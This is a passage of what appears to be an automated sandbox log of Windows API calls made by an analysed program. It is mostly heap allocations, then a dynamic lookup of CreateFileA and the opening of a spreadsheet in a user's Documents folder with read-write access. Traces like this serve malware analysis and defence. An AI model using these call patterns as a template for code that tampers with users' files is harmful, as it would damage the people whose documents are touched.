hHeap=0x770000) returned 1 [0032.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889a60 [0032.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0032.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0032.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0032.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0032.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0032.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0032.718] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0032.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0032.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0032.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0032.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0032.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0032.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0032.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0032.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0032.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0032.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0032.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0032.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0032.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0032.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0032.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0032.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0032.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0032.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0032.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0032.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0032.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0032.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0032.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0032.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0032.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0032.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0032.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0032.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0032.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0032.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0032.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0032.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0032.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0032.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0032.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0032.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0032.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0032.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0032.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0032.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0032.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0032.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0032.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0032.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0032.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0032.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0032.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0032.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0032.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0032.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0032.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0032.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0032.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0032.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0032.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0032.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0032.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0032.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0032.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0032.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0032.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0032.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0032.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0032.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0032.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0032.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0032.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0032.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0032.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0032.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0032.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0032.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0032.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0032.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0032.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0032.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0032.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0032.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0032.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0032.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0032.721] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0032.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0032.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0032.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0032.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0032.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0032.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0032.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0032.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0032.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0032.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0032.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0032.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0032.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0032.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0032.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0032.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0032.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0032.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0032.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0032.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0032.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0032.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0032.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0032.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0032.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0032.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0032.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0032.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0032.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0032.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0032.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0032.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0032.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0032.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0032.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0032.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0032.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0032.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0032.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0032.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0032.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0032.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0032.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0032.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0032.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0032.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0032.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0032.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0032.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0032.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0032.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0032.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0032.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0032.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0032.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0032.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0032.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0032.722] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0032.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0032.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0032.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0032.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0032.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0032.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0032.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0032.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0032.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0032.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0032.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0032.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0032.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0032.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0032.723] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0032.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0032.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0032.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0032.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88ce50 [0032.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88ce50, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0032.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0032.723] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0032.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0032.723] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0032.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0032.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0032.723] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0032.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0032.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0032.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce50 [0032.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88ce50, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0032.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0032.724] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0032.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0032.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0032.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0032.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0032.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0032.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0032.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0032.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0032.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0032.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0032.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0032.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0032.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0x935008 [0032.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\60y_PcRGjqYHqff.xlsx", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0032.724] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3d) returned 0x7ab260 [0032.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\60y_PcRGjqYHqff.xlsx", cchWideChar=61, lpMultiByteStr=0x7ab260, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\60y_PcRGjqYHqff.xlsx", lpUsedDefaultChar=0x0) returned 61 [0032.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0032.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0032.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0032.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0032.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0032.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0032.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0032.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0032.724] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0032.725] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\60y_PcRGjqYHqff.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\60y_pcrgjqyhqff.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0032.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0032.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0032.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0032.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0032.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0032.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0032.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0032.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0032.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0032.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0032.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0032.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0032.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0032.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0032.725] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=61, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0032.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x7a) returned 0x7d5b30 [0032.725] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=61, lpWideCharStr=0x7d5b30, cchWideChar=61 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\60y_PcRGjqYHqff.xlsx") returned 61 [0032.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0032.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0032.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0032.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0032.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0032.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0032.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0032.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0032.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0032.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0032.725] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0032.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0032.725] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0032.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0032.726] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0032.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0032.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0032.726] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0032.726] RtlAllocateHeap 